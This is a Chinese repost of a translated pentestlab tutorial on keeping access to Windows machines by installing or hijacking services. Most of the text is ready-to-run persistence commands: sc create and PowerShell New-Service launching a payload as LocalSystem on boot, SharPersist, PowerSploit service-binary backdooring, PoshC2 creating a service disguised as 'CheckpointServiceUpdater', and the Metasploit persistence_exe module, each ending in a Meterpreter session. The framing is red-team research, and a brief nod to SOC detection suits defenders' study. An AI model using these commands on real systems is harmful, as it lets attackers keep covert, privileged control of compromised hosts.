首页 > 其他分享 >Window权限维持(三):新服务

Window权限维持(三):新服务

时间:2023-05-22 13:01:29浏览次数:31  
标签:exe 服务 temp cmd Window 持久性 pentestlab 权限 维持


如果未正确配置Windows环境中的服务或这些服务可以用作持久性方法,则这些服务可能导致权限提升。创建一个新的服务需要管理员级别的特权,它已经不是隐蔽的持久性技术。然而,在红队的行动中,针对那些在威胁检测方面还不成熟的公司,可以用来制造进一步的干扰,企业应建立SOC能力,以识别在其恶意软件中使用基本技术的威胁。

命令行实现

如果帐户具有本地管理员特权,则可以从命令提示符创建服务。参数“ binpath ”用于执行任意有效负载,而参数“ auto ”用于确保恶意服务将自动启动。

sc create pentestlab binpath= "cmd.exe /k C:\temp\pentestlab.exe" start="auto" obj="LocalSystem"sc start pentestlab
sc create pentestlab binpath= "cmd.exe /k C:\temp\pentestlab.exe" start="auto" obj="LocalSystem"sc start pentestlab

Window权限维持(三):新服务_Windows

CMD –新服务

或者,可以直接从PowerShell创建新服务。

New-Service -Name "pentestlab" -BinaryPathName "C:\temp\pentestlab.exe" -Description "PentestLaboratories" -StartupType Automatic
sc start pentestlab
New-Service -Name "pentestlab" -BinaryPathName "C:\temp\pentestlab.exe" -Description "PentestLaboratories" -StartupType Automatic
sc start pentestlab

Window权限维持(三):新服务_Windows_02

PowerShell持久性–新服务

在两种情况下,启动服务时都会打开Meterpreter会话。

Window权限维持(三):新服务_持久性_03

Meterpreter –新服务

SharPersist

SharPersist支持在受感染系统中创建新服务的持久性技术。在系统上安装新服务需要提升的访问权限(本地管理员)。以下命令可用于添加新服务,该服务将在Windows启动期间作为本地系统执行任意有效负载。

SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -n "pentestlab" -m add
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c pentestlab.exe" -n "pentestlab" -m add

Window权限维持(三):新服务_PowerShell_04

SharPersist–添加服务

Meterpreter会话将再次建立,或者与任何其他能够与有效负载进行通信的命令和控制框架建立连接。

Window权限维持(三):新服务_Windows_05

SharPersist–通过服务的计划任务

PowerSploit

PowerSploit可用于对合法服务进行后门程序以实现持久性。可以利用两个PowerShell函数来修改现有服务的二进制路径,或者从先前手动创建的自定义服务中修改二进制路径,以执行任意有效负载。

Set-ServiceBinPath -Name pentestlab -binPath "cmd.exe /k C:\temp\pentestlab.exe"Write-ServiceBinary -Name pentestlab -Command "cmd.exe /k C:\temp\pentestlab.exe"
Set-ServiceBinPath -Name pentestlab -binPath "cmd.exe /k C:\temp\pentestlab.exe"Write-ServiceBinary -Name pentestlab -Command "cmd.exe /k C:\temp\pentestlab.exe"

Window权限维持(三):新服务_Windows_06

PowerSploit –持久性

PoshC2

PoshC2还具有创建新服务作为持久性技术的能力。但是,将执行base-64 PowerShell负载,而不是任意可执行文件。从植入物处理机,以下模块将自动执行该技术。

install-servicelevel-persistence
install-servicelevel-persistence

Window权限维持(三):新服务_PowerShell_07

PoshC2持久性–安装新服务

PoshC2将自动生成有效负载,并且该命令将在目标系统上执行以创建新服务。

Window权限维持(三):新服务_PowerShell_08

PoshC2持久性–新服务

该服务将自动启动,并具有名称“ CheckpointServiceUpdater ”,以使其看起来合法。

Window权限维持(三):新服务_PowerShell_09

PoshC2持久性–创建新服务

Metasploit

Metasploit框架具有一个后开发模块,该模块支持两种持久性技术。

  1. 注册表运行键
  2. 新服务

需要将启动变量修改为SERVICE,以便在系统上安装新服务。

use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 1set STARTUP SERVICE
set LOCALEXEPATH C:\\tmp
run
use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 1set STARTUP SERVICE
set LOCALEXEPATH C:\\tmp
run

Window权限维持(三):新服务_PowerShell_10

Metasploit持久性模块–服务

需要Metasploit多重/处理程序模块来捕获有效负载并与受感染的主机建立Meterpreter会话。

Window权限维持(三):新服务_Windows_11

Metasploit Meterpreter –通过新服务的持久性

译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。https://pentestlab.blog/2019/10/07/persistence-new-service/


标签:exe,服务,temp,cmd,Window,持久性,pentestlab,权限,维持
From: https://blog.51cto.com/bypass/6323116

相关文章

  • 基于springboot的宿舍管理系统实现宿管、后勤权限功能
    项目描述系统中的用户分为三类,分别为学生、宿管、后勤。这三类用户拥有不同的操作权限。系统中用到的技术包括Axios,Echarts,POI。特色功能有人性化的宿舍分配,可视化的账单管理、房间管理、记账管理,Excel文件上传后数据导入数据库等等。运行环境idea+mysql5.7+jdk1.8+maven3......
  • WSL启动windows系统中的应用
    以在wsl终端打开windows下的paraview为例首先在wsl终端中通过vim~/.bashrc打开.bashrc文件,在.bashrc文件的最后添加aliasparaview=“/mnt/d/ParaView/bin/paraview.exe”其中的 “=” 号前面的 paraview 为在wsl中启动windows中的软件paraview中命令,而 “=” 号......
  • 如何关闭windows系统更新
    如何关闭windows系统更新:有时候我们电脑里有些环境,怕系统更新后不兼容出现各种各样的问题是时,我们可以手动关闭windows更新,方法如下:一、关闭系统更新服务器:1.1、在桌面“此电脑”右键选择“管理”,见下图: 1.2、在计算机管理中选择“服务和应用程序”,见下图: 1.3、然后......
  • 如何在Windows中使用FAT32格式化大于32GB的U盘SD卡TF卡
    diskgenius大容量FAT32 如何在Windows中使用FAT32格式化大于32GB的U盘由于FAT32格式本身在Windows系统中的一些限制,以及目前超过32GB的大容量U盘已经成为了主流,所以默认情况下Windows系统只能把容量小于32GB的U盘格式化为FAT32格式,对于大于32GB存储的大容量优盘就没有了相应......
  • Windows 2012安装mysql 5.7.21
    文档课题:Windows2012安装mysql5.7.21系统:MicrosoftWindowsServer2012Standard64位数据库:mysql5.7.21安装包:mysql-installer-community-5.7.21.0.msi1、下载自MySQL版本升级到5.7后,安装和配置过程发生很大变化,以下介绍5.7版本MySQL的下载、安装及配置过程.针对不同......
  • linux4位权限分别代表什么意思(转载)
    接触linux一段时间了,有个权限问题让我一直郁闷。网上也没找到(估计是关键字不对),就是这个0777,最前面的0是什么意思。最近看到一本书(Linux与unixshell编程指南),终于找到答案了。 先说一下777什么意思吧,linux下文件权限分为所属用户权限、所属组权限和其他权限。每一个又分为r(读)w(写)x(可......
  • 微软推出Windows 11 Insider预览版22621.1255和22623.1255
    您好,WindowsInsider,今天我们将向Beta频道发布Windows11Insider预览版22621.1255和22623.1255(KB5022918)。Build22623.1255=推送新功能。Build22621.1255=默认情况下关闭新功能。提醒:以前在22622版本上的内部人员将通过启用包自动转移到22623版本。启用包人为地增加了新功能推出......
  • 配置k8s的一个serviceaccount具有管理员权限并获取他的token
    创建sa账户/授定管理员角色权限cat>sa.yaml<<eofapiVersion:v1kind:ServiceAccountmetadata:name:kubepi-usernamespace:kube-systemeofcat>rolebe.yaml<<eofapiVersion:rbac.authorization.k8s.io/v1kind:ClusterRoleBindingmetadata:na......
  • Windows平台下安装binwalk
    (4条消息)Windows平台下安装binwalk_binwalk下载_烟雨天青色的博客-CSDN博客https://blog.csdn.net/qq_38603541/article/details/126557575关于binwalkBinwalk是一款快速、易用,用于分析,逆向工程和提取固件映像的工具。简单易用,完全自动化脚本,并通过自定义签名,提取规则和插件模......
  • Python虚拟环境,多版本共存-windows安装【记录】
    使用virtualenv可以快速创建干净的环境,并且可以指定版本。安装virtualenvpipinstallvirtualenv创建虚拟环境virtualenv-pD:\Python\Python36\python.exevenv36D:\Python\Python36\python.exe可以选择已安装的python版本venv36创建的虚拟环境的目录进入虚拟环境......